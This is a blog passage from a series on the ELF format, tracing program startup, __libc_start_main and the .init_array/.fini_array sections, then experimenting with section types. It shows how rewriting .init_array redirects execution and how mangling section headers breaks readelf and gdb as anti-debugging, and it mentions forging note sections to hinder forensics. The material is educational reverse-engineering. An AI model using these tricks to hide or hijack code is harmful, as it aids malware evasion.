So from this figure we can see the arguments being passed to the binary is "<span style="font-family: "courier new" , "courier" , monospace;">1 2 3 4 5</span>". We can also see that the first entry in argv is the name of the binary itself, this means the length of <span style="font-family: "courier new" , "courier" , monospace;">argv</span> should be <span style="font-family: "courier new" , "courier" , monospace;"><b>6</b></span>, as is shown at the first address on the stack at <span style="font-family: "courier new" , "courier" , monospace;">0x7fffffffddb0</span>. Next argument on the stack is the start of the actual <span style="font-family: "courier new" , "courier" , monospace;">argv</span> array, and after that we have a null terminator and the start of the <span style="font-family: "courier new" , "courier" , monospace;">envp</span> array.<br />
<br />
Back to the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> method. After first pop off of the stack; the top of the stack holds a pointer to <span style="font-family: "courier new" , "courier" , monospace;">argv</span> and at instruction <span style="font-family: "courier new" , "courier" , monospace;"><_start+6></span> we save that to <span style="font-family: "courier new" , "courier" , monospace;">rdx</span>. After this at the <span style="font-family: "courier new" , "courier" , monospace;"><_start+9></span> instruction we use a bit mask to clear a few bits from the stack value to ensure its aligned properly and then proceed to prep it for the call to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> (<i>the reason this is done is essentially to ensure that we are increment the stack and accessing it in neat chunks - it also makes all the tools dump nice groupings of stack information</i>).<br />
<br />
Once the stack is aligned it pushes <span style="font-family: "courier new" , "courier" , monospace;">rax</span> onto the stack according to some stuff I've read on this says this is purely to preserve memory alignment boundaries as well, and that this value in <span style="font-family: "courier new" , "courier" , monospace;">rax</span> isn't used and doesn't mean anything.<br />
<br />
I've dumped the register values when the call to <span style="font-family: "courier new" , "courier" , monospace;">_libc_start_main</span> happens just to check out what is actually being passed to it:<br />
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO1ZXsslvKqSRX_uYYHKkvLXLahjsRvNJuYvpoGtrZUKu1Dql8CTXaz_SilxERPsB4afM8tkkKv2NOOq9sThclUzLpNf_dWSJJVW67WOreohGFv1D_G51n57moan_wpECqd6ohhuQPhgs/s1600/Screenshot+from+2018-10-05+14-07-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="636" data-original-width="1233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO1ZXsslvKqSRX_uYYHKkvLXLahjsRvNJuYvpoGtrZUKu1Dql8CTXaz_SilxERPsB4afM8tkkKv2NOOq9sThclUzLpNf_dWSJJVW67WOreohGFv1D_G51n57moan_wpECqd6ohhuQPhgs/s1600/Screenshot+from+2018-10-05+14-07-36.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
We are clearly using the SystemV ABI for x86_64 calling convention here. This is since instead of pushing all parameters onto the stack in a given order, we do the following:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
Parameters to functions are passed in the registers rdi, rsi, rdx, rcx, r8, r9, and further values are passed on the stack in reverse order.</blockquote>
</div>
<div>
<br /></div>
<div>
- <a href="https://wiki.osdev.org/System_V_ABI">https://wiki.osdev.org/System_V_ABI</a></div>
<div>
<br /></div>
<div>
And as we see the registers contain the following:</div>
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">rdi</span> - pointer to first instruction in <span style="font-family: "courier new" , "courier" , monospace;">int (*main)</span> function</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">rsi</span> - <span style="font-family: "courier new" , "courier" , monospace;">argc</span> value</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">rdx</span> - <span style="font-family: "courier new" , "courier" , monospace;">argv</span> pointer</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">rcx</span> - pointer to first instruction in <span style="font-family: "courier new" , "courier" , monospace;">libc_csu_init</span> - the program's constructor call handler again . </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">r8</span> - pointer to <span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_fini</span> </li>
<li>r9 - pointer to <span style="font-family: "courier new" , "courier" , monospace;">rtld_init</span> the mysterious dymanic linker desctuctor call handler. </li>
</ul>
</div>
<div>
And in case you don't believe me check out this dank documentation in the glibc libary confirming that we reverse engineered this correctly (<i>or that it actually works as the code intends</i>) - <i>coming through strong with the documentation once again [see footnote 1] </i>The following extract is from<br />
<br />
<script src="https://gist.github.com/k3170makan/067d8626a6854791c4f404ae2da29705.js"></script>
<br />
There are some other interesting details to what <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> does after this, some of which involves deep Elf sorcery like reading past the value of argv to find envp. There are wonderful articles on this on the <a href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">internet</a> and the <a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L137">code for <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span></a> is also available. I take it you folks would enjoy the exercise of confirming it works as described.<br />
<br />
To summarize <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, and bring the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> and <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> in to context. Essentially what start_main does is stuff like:<br />
<br />
<ul style="text-align: left;">
<li>Setup stack guard:</li>
<ul>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L205">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L205</a> </li>
<li><a href="https://github.com/lattera/glibc/blob/master/sysdeps/unix/sysv/linux/dl-osinfo.h#L51">https://github.com/lattera/glibc/blob/master/sysdeps/unix/sysv/linux/dl-osinfo.h#L51</a> </li>
</ul>
<li>Register destructors (including the one for the rtld) so they are called</li>
<ul>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L238">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L238 </a></li>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L248">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L248</a> </li>
</ul>
<li>Check that the file descriptors <span style="font-family: "courier new" , "courier" , monospace;">STDIO</span> <span style="font-family: "courier new" , "courier" , monospace;">STDERR</span> <span style="font-family: "courier new" , "courier" , monospace;">STDIN</span> are setup properly:</li>
<ul>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/check_fds.c#L87">https://github.com/lattera/glibc/blob/master/csu/check_fds.c#L87 </a></li>
</ul>
</ul>
<div>
<br /></div>
<div>
Some other cool stuff and of course eventually makes the call to<span style="font-family: "courier new" , "courier" , monospace;"> (*init) </span>which in the context of <span style="font-family: "courier new" , "courier" , monospace;">start_main</span>, means <span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_init.</span> This is the function that as we see in the footnotes actually makes the call to the init functions we define. Here's confirmation of that call chain from gdb:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl4Uyizc6F4oJHEs24YUuuB-JxryMUErlZfxGDxkZ6CH-vXITCucDdou1iGQ2FX0HJYsniGVvrlbV1f9gIVVUXERAW7l6DB1qW2eE0pCP8E1h0d0eFEgLitEHgLbRRkjnJzgIsetryJN0/s1600/Screenshot+from+2018-10-05+23-42-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="214" data-original-width="1314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl4Uyizc6F4oJHEs24YUuuB-JxryMUErlZfxGDxkZ6CH-vXITCucDdou1iGQ2FX0HJYsniGVvrlbV1f9gIVVUXERAW7l6DB1qW2eE0pCP8E1h0d0eFEgLitEHgLbRRkjnJzgIsetryJN0/s1600/Screenshot+from+2018-10-05+23-42-48.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">foo_constructor</span> is obviously our constructor and we can see it indeed does get call first from <span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_init</span>. These constructors are saved in the sections marked <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> and the analogous array for deconstructors is called <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span>. Next section covers how they work.</div>
<h2 style="text-align: left;">
.init_array and .fini_array Sections and hex sorcery</h2>
I'd like to get straight into deconstructing how the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> and <span style="font-family: "courier new" , "courier" , monospace;">.fini_array </span>sections work. Lets see what they look like in the section header table and annotate all their fields in an honest <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtuj_cHGizw9qbzpkH8JVTmmAYO9BHTODgmEsu4uKKmZLjsqOev6BZ11BT6z_1zD9klWvKALAgECfdhjROGV8hbT9rVlBOE2XLvwjD1NZIaq1U_EIiO1qLmw-_fkzx_wjFZuL65N0a9I/s1600/init_fini+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="637" data-original-width="1101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtuj_cHGizw9qbzpkH8JVTmmAYO9BHTODgmEsu4uKKmZLjsqOev6BZ11BT6z_1zD9klWvKALAgECfdhjROGV8hbT9rVlBOE2XLvwjD1NZIaq1U_EIiO1qLmw-_fkzx_wjFZuL65N0a9I/s1600/init_fini+%25281%2529.png" /></a></div>
<br />
<br />
<br />
What we can see here is that the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> section points into the ELF file at <span style="font-family: "courier new" , "courier" , monospace;">0x0e00</span>, which holds two addresses:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x0e00</span> <span style="font-family: "courier new" , "courier" , monospace;">(.init_array)</span></li>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x400540 (frame_dummy)</span> - <i>not going to dig into this too much, but what I glean about this for now is that this sets up things to be able to do exception handling and reconstructing stack frames to aid debugging and stack forensics. More on this <a href="https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf">here</a> and <a href="http://alien.cern.ch/cache/autopackage-1.0/site/docs/devguide/ch07s05.html">here</a>.</i></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x400440 (foo_constructor)</span> - our constructor!</li>
</ul>
</ul>
<div>
We also have the <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> section at <span style="font-family: "courier new" , "courier" , monospace;">0x0e10</span> which is holds these entries:</div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x0e10</span> <span style="font-family: "courier new" , "courier" , monospace;">(.fini_array)</span></li>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x400520 (__do_global_dtors_aux) </span>- <i>handles destructors when <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> is not defined according to <a href="https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf">this</a>.</i></li>
<li> <span style="font-family: "courier new" , "courier" , monospace;">0x400430 (foo_destructor)</span> - our destructor!</li>
</ul>
</ul>
</div>
So we know where to find the pointers to our desctructor and constructor functions and we know when they will be called, lets see if we can force the binary to call another function instead.<br />
<br />
So if I were to make the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> point to the function <span style="font-family: "courier new" , "courier" , monospace;">never_call</span>, which as in the previous example is never called under normal execution here's what the <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> would look, like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5DArrTDmwJVvAL12bz63KAbg-T-LFzDnm5YmKmL_oY9l4cz3aL5DXKfqpSf9TTamZrELN_zrnJtdQV95T-LmW-k6lEo5Cr_mNzj7HUGYLEFbG6fzeKZq8g4vnj8Qh_2UZsKXbVT0Yl0/s1600/never_call_init.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="1143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5DArrTDmwJVvAL12bz63KAbg-T-LFzDnm5YmKmL_oY9l4cz3aL5DXKfqpSf9TTamZrELN_zrnJtdQV95T-LmW-k6lEo5Cr_mNzj7HUGYLEFbG6fzeKZq8g4vnj8Qh_2UZsKXbVT0Yl0/s1600/never_call_init.png" /></a></div>
<br />
<br />
Win! We can control the flow of execution by redirecting the entries in the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> section! This works of course the same way for <span style="font-family: "courier new" , "courier" , monospace;">fini_array</span> I'm going to leave that for you folks to figure out if you'd like to.<br />
<br />
Thanks for reading this one, more posts on deep Elf sorcery and other wonderful linuxy things comings soon!<br />
<h2>
References and Recommended Reading</h2>
<ol style="text-align: left;">
<li>How C Programs get run <a href="https://lwn.net/Articles/631631/">https://lwn.net/Articles/631631/</a> </li>
<li>System V intel <a href="https://software.intel.com/sites/default/files/article/402129/mpx-linux64-abi.pdf">https://software.intel.com/sites/default/files/article/402129/mpx-linux64-abi.pdf</a> </li>
<li>System V ABI <a href="https://wiki.osdev.org/System_V_ABI">https://wiki.osdev.org/System_V_ABI </a></li>
<li>Examining Memory with GDB <a href="https://sourceware.org/gdb/onlinedocs/gdb/Memory.html">https://sourceware.org/gdb/onlinedocs/gdb/Memory.html</a> </li>
<li><a href="https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf">https://stackoverflow.com/questions/34966097/what-functions-does-gcc-add-to-the-linux-elf </a></li>
<li><a href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html</a> </li>
</ol>
<h2>
Footnotes</h2>
<h3 style="text-align: left;">
<i>1 - </i>why _dl_fini should be refered to as the desctructor "function call handler" in my opinion</h3>
<div>
<br /></div>
<div>
This is since, though some folks refer to this as THE [de/con]-structor function, in reality it is only the standardized function that finds the pointers TO the user defined [de/con]-structor functions. Here's why I say so, extract from <a href="https://github.com/lattera/glibc/blob/master/elf/dl-fini.c#L137">https://github.com/lattera/glibc/blob/master/elf/dl-fini.c#L137</a>: </div>
<div>
<script src="https://gist.github.com/k3170makan/56d3c3442ec3109d1341883a56d5290e.js"></script>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<i>What can I say folks that glibc comment game is solid though. Code speaks for its Elf around here ;)</i></div>
<div>
So I take it, this makes it obvious that the pointer to the <span style="font-family: "courier new" , "courier" , monospace;">dl_fini</span> function can actually be refereed to as more of a destructor "call handler", no? To close my point lets look at <span style="font-family: "courier new" , "courier" , monospace;">dl_init.c</span> for the definition of <span style="font-family: "courier new" , "courier" , monospace;">__dl_init</span> as well:<br />
<br />
<br /></div>
<div>
<script src="https://gist.github.com/k3170makan/6ed1ae0e4230f83d1f8408852e796d8d.js"></script>
</div>
<div>
Pretty much the same thing, it uses some link map type object ( <span style="font-family: "courier new" , "courier" , monospace;"> ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY]; </span>) loaded with the offsets and all the ELF format goodies. Uses this to calculate an offset to the init function array, and then just runs through them calling them with pointers to <span style="font-family: "courier new" , "courier" , monospace;">argv</span>, <span style="font-family: "courier new" , "courier" , monospace;">argc</span> and <span style="font-family: "courier new" , "courier" , monospace;">envp.</span><br />
<br />
Anyway, while make that heavily egotistical point we actually traversed some pretty important code in the Elf world, this is the very definition of the <span style="font-family: "courier new" , "courier" , monospace;">_dl_fini </span>function that handles your binary. If you wanna unlock the s e c r e t s you should spend some time digging through that <span style="font-family: "courier new" , "courier" , monospace;">/elf/</span> directory.<br />
<br /></div>
<div>
<div>
<h3 style="text-align: left;">
</h3>
</div>
<div>
<br /></div>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-68343931561412104242018-10-04T17:54:00.000-07:002018-10-04T19:14:09.796-07:00Introduction to The ELF Format (Part IV): Exploring Section Types and Special Sections<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi folks, this post is part of a series about the ELF format. So far in this series we have:<br />
<br />
<ol style="text-align: left;">
<li>ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a> </li>
<li>ELF Header and Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html%C2%A0">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>ELF Header and Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html%C2%A0">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
</ol>
<div>
In this post I'm going to go over in detail how some of the sections in the format work in a bit more detail. Previous posts didn't really expand on all the weirdness that each individual section type and format can harbor, especially in how it can break interpretation of the file under normal debugging and reverse engineering efforts. We're going to run through a couple sections here, talk about different section types and see what ELFs can make some of the binutils do if we mess around with the bytes. Hope you folks enjoy!</div>
<div>
<h3 style="text-align: left;">
Section Types</h3>
</div>
<div>
From other posts I've already expanded on the section table header and in that header we have a field called sh_type, which indicates the section type. Each section type is like a model or layout type for a given kind of section and imposes certain attributes to how the bits and bytes are grouped together to mean things in those sections. For instance they might be simple lists or complex nested hash look up tables.<br />
<br />
To make this clearer; lets imagine how this aids problem solving in the ELF format. Lets say a compiler, malware or exploit developer needs a section to host a simple list of strings, in this case a section type of <span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB</span> would be appropriate. And as we see the <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> and <span style="font-family: "courier new" , "courier" , monospace;">.strtab</span> are exactly those types:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyF-LRC-AtM0CEhW9Kd1TCUBfZJ4DYmQt9ZKAhg4Z0ysMfcHHxW7BxsjfQAmBrL1KFaAwL_kzcoVuJbzo02h0UB519BnQ2hJ5Lh3htKwXa_Ktt3dBSwSJZCAhG-g3ZC7VFdudo_-x7UfQ/s1600/Screenshot+from+2018-09-28+21-56-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="1140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyF-LRC-AtM0CEhW9Kd1TCUBfZJ4DYmQt9ZKAhg4Z0ysMfcHHxW7BxsjfQAmBrL1KFaAwL_kzcoVuJbzo02h0UB519BnQ2hJ5Lh3htKwXa_Ktt3dBSwSJZCAhG-g3ZC7VFdudo_-x7UfQ/s1600/Screenshot+from+2018-09-28+21-56-39.png" /></a></div>
<br />
<br />
Here's a list of what the some of others are meant to be used for:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_NULL</span> - purely for storing null bytes, documentation refers to this as directly for marking a section as unused and will most probably be skipped over by most semantically driven ELF utilities. This is also a field that sometimes avoids reading strings over-into other sections. One can imagine many C programmers enjoy scanning until the cows come home OR they hit a null byte - this is the odd reason why such fields are necessary sometimes. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_PROGBITS</span> - This is just a marking for a section that says it could contain anything, and the format is usually dictated by the program being executed essentially. <span style="font-family: "courier new" , "courier" , monospace;">PROGBIT</span>s is pretty much for program specific behavior - which could be anything - literally anything even Turing complete anything! These are typically used for marking the sections that contain actual code for execution, the data section, initialization / finalization procedures <i>(or perhaps even wilder concepts specific to the ABI or compiler producing the executable code sections and accompaniments - again this section type doesn't impose much format control really</i>) </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_SYMTAB - </span>This provides a pointer to a section that should have the format of the symbol table - I will of course flesh out how this works later on in the post because it needs it own space so in a literal way I'm going to use this keyword to mark a section further down in the post :) </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB </span>- A section that holds a null terminated list of strings.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">SHT_HASH -</span> This section is for holding a hash table, usually to speed up looking for symbols. In fact documentation says that if an executable participate in dynamic linking it MUST have one of these sections. I will put that bold brave beautiful claim to the test later on in the post <i>(if not in its own post depending on how exciting this potential lie becomes</i>).</li>
</ul>
<div>
There are tons more section types, I thing its best to revert to the documentation on the full list instead of re-creating it here. Lets take a closer look at how some of these work though.</div>
<div>
<br />
<h2 style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB</span> section types (.shstrndx and friends)</h2>
<br />
Looking at what a typical <span style="font-family: "courier new" , "courier" , monospace;">SHT_STRTAB</span> is like in a hexdump:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj93tCd92PoVBW-88Oo-QkrdARPHv7TGEK_QMpwaQeGpNg75uW_NlEyR6l3ko9AzvYY7gACs8idy5Dvo_tHGim53VyaVs-dGoaQbk8J0emK_CNvM60R4y29S9KZQ7Ny01G8wwTx2uD8WPA/s1600/string+table+section+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="197" data-original-width="1075" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj93tCd92PoVBW-88Oo-QkrdARPHv7TGEK_QMpwaQeGpNg75uW_NlEyR6l3ko9AzvYY7gACs8idy5Dvo_tHGim53VyaVs-dGoaQbk8J0emK_CNvM60R4y29S9KZQ7Ny01G8wwTx2uD8WPA/s1600/string+table+section+%25281%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
As you can see the strings are nice and neatly delimited by null bytes, super easy to not mess this up when reading in strings in C :))).<br />
<br />
In previous posts I mentioned that the <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> holds section names, which means it provides a good starting point for mangling the section attributes in a way that skews their interpretation by debug tools or other ELF interpreters - a key skill in understanding how they work!*<br />
<br />
So in this same method; for the first experiment I decided to point the start of the <span style="font-family: "courier new" , "courier" , monospace;">shstrtab</span> down 8 bytes to see what happens to <span style="font-family: "courier new" , "courier" , monospace;">readelf</span>'s output about the sections; I get the following results:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ou1gp5h5T1nslyOxS2UHMFwr9ncCi_KY6TbCNJ6LBn7Mu_pPnR_r5S1Pi3CCxiaHv1KA5POyto7XWqzR3pueY4IeBHf3osKpTSknWDk-8TgS7TCXdCvwVv4FoqplUXAYSBYIe11B5oE/s1600/shstrtabndx+experiment+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="954" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ou1gp5h5T1nslyOxS2UHMFwr9ncCi_KY6TbCNJ6LBn7Mu_pPnR_r5S1Pi3CCxiaHv1KA5POyto7XWqzR3pueY4IeBHf3osKpTSknWDk-8TgS7TCXdCvwVv4FoqplUXAYSBYIe11B5oE/s1600/shstrtabndx+experiment+%25281%2529.png" /></a></div>
<br />
Just to make the diagram clearer, what we have here is on the top frame, the raw <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> of the start of the <span style="font-family: "courier new" , "courier" , monospace;">shstrtab</span>. Originally started at <span style="font-family: "courier new" , "courier" , monospace;">0x18F4</span> and we shifted it down to start at <span style="font-family: "courier new" , "courier" , monospace;">0x18FC</span>.<br />
<br />
What you should see in this <i>perhaps bloated diagram sketch</i>; is that by moving the start of the <span style="font-family: "courier new" , "courier" , monospace;">shstrtab</span> section we've seen that the strings jump 8 bytes down for each entry. More accurately we can say they all start 8 bytes down, but because they are strings <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> will read bytes in until it hits a null byte. For instance we can see that the first section name instead of <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> which is at <span style="font-family: "courier new" , "courier" , monospace;">0x1910 </span>originally now points to <span style="font-family: "courier new" , "courier" , monospace;">0x1917</span>. The <span style="font-family: "courier new" , "courier" , monospace;">.interp </span>section usually the first valid section is now called <span style="font-family: "courier new" , "courier" , monospace;">.note.ABI-tag.</span>The following section name (<i>which starts 8 bytes down</i>) is then, <span style="font-family: "courier new" , "courier" , monospace;">I-tag</span> (<i>since this starts at <span style="font-family: "courier new" , "courier" , monospace;">0x191F</span></i>) and then reads until it hits the null byte at <span style="font-family: "courier new" , "courier" , monospace;">0x1924</span>.. The rest of the sections follow the same pattern - good exercise would be to to confirm this on your own.<br />
<br />
Okay so what happens when we mangle the section types? Lets say we NULL them out, swap section types on some of them and see if the program still runs - and if it doesn't why and how far it manages to get close to running.<br />
<br />
Here's the results from <span style="font-family: "courier new" , "courier" , monospace;">NULL</span>ing out the section types (<i>re-call that marking a section has a null type in the section header table imposes that it will be "skipped"</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrymS4TI2ZXddpdCXBPP81K0x7LjYPsbCeKMxy4EJsLifBBKAjtPCEEjupB4KeZDeIIjPzRN9wIUArIOczN1iwu6DpktUwDKjE28ZzWGo38Gxxdbu5IBITUPhfowaF71NZieRRqCxhwjg/s1600/null+section+types+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="296" data-original-width="1249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrymS4TI2ZXddpdCXBPP81K0x7LjYPsbCeKMxy4EJsLifBBKAjtPCEEjupB4KeZDeIIjPzRN9wIUArIOczN1iwu6DpktUwDKjE28ZzWGo38Gxxdbu5IBITUPhfowaF71NZieRRqCxhwjg/s1600/null+section+types+%25281%2529.png" /></a></div>
<br />
<br />
The large white column here marks the column in this ELF that contains the <span style="font-family: "courier new" , "courier" , monospace;">sh_type</span> bytes, I'm really just being lazy with labeling here and leaving identification of the individual section types up to the reader if need be. But once you get in the swing of identifying the section table layout by hand, you'll quickly realize if this column is null it immediately means a whole bunch of section types are nulled out. The smaller boxes next to this column, shows some virtual addresses for some of the sections, I highlight them here so you can see quickly that we have indeed written over the records for sections shown on the right. We can also see in the <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> that the section header table starts at <span style="font-family: "courier new" , "courier" , monospace;">0x1a00</span> (<i>which is a common value and the one we often see for the example binary I'm using, so we can guess that I probably didn't change that, the faults are here caused directly by the section sh_type mangling alone</i>). To confirm another way we can see that in the <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> output on the right, all the section types are indicated by NULL.<br />
<br />
We can also see this does strange things to <span style="font-family: "courier new" , "courier" , monospace;">gdb</span> when its trying to load some information from those sections and can even break its ability to interpret it as an executable:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfwpjukD6bPKE6les9GEG4CLkAl6eFMVw4wsAjvaXMFUdDqL9YDaSYQnUBoRKgjzB4ZDHmVPVzRL52DAlPFy1YV2D631L9Cw13tJ-eXn2WB41hIC70PObG87Ej84C_2-CzQdsY-ZFwn0/s1600/nullsectionsingdb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="497" data-original-width="751" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfwpjukD6bPKE6les9GEG4CLkAl6eFMVw4wsAjvaXMFUdDqL9YDaSYQnUBoRKgjzB4ZDHmVPVzRL52DAlPFy1YV2D631L9Cw13tJ-eXn2WB41hIC70PObG87Ej84C_2-CzQdsY-ZFwn0/s1600/nullsectionsingdb.png" /></a></div>
<br />
Some rudimentary anti-debugging right there. Of course the immediate compliment of this as a reverse engineering effort would be to reconstitute the section headers from a stripped binary (<i>this would work essentially by understanding common layouts of the file and identifying the most possible offsets for the <span style="font-family: "courier new" , "courier" , monospace;">sh_*</span> fields</i>). It might be worth it to explore what happens when you mangle other section attributes and pass it to other utilities like <span style="font-family: "courier new" , "courier" , monospace;">strace</span> and <span style="font-family: "courier new" , "courier" , monospace;">ltrace. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">Moving on!</span><br />
<h2 style="text-align: left;">
SHT_NOTE sections (.note.ABI-tag and friends)</h2>
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">SHT_NOTE</span> type sections are simple lists of integers that provide versioning and typing for vendors. The GNU folks tend to mark ELFs liberally with these sections on GNU/Linux systems. In fact these sections are meant to indicate that they were built by tools from these systems and indicate versioning information about them. So it lists your kernel version or GNU tool version potentially lets say (<i>of course if you're doing forensics this might be helpful, or if you're avoiding it, it might be worth stripping or forging this field hehe</i>).<br />
<br />
This section holds some semantic versioning information about the ABI being used and the operating system this file is for. The format of the field is basically simply a list containing 4 32 bit-words or 4 groups of 4 bytes. The layout works as follows:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00 (4 bytes) namesz </span>- size of the name field in bytes. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x04 (4 bytes) descsz</span> - size of the desc field in bytes</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x08 (4 bytes) type</span> - the type field of the OS ABI</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x0C (4 bytes) name</span> - the name field containing a null terminated list of characters</li>
